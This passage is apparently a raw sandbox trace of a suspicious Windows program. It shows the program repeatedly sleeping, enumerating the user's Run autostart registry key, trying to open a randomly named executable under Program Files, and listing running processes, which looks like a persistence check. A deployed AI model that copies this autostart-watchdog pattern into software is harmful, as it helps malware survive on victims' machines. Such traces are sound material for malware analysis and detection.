NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.939] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.939] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.939] NtClose (Handle=0x14c) returned 0x0 [0175.939] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.939] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.939] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.939] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.939] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.940] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.944] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.953] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.953] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.953] NtClose (Handle=0x14c) returned 0x0 [0175.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.953] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.953] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.953] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.954] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.957] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.971] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.971] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.971] NtClose (Handle=0x14c) returned 0x0 [0175.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.971] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.972] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.972] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.972] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.976] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.984] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.984] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.985] NtClose (Handle=0x14c) returned 0x0 [0175.985] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.985] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.985] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.985] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.985] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.985] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.990] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.002] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.003] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.003] NtClose (Handle=0x14c) returned 0x0 [0176.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.003] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.003] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.004] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.004] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.004] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.009] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.016] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.016] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.016] NtClose (Handle=0x14c) returned 0x0 [0176.016] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.016] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.016] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.017] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.017] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.017] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.021] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.035] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.035] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.035] NtClose (Handle=0x14c) returned 0x0 [0176.035] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.035] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.035] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.035] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.035] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: 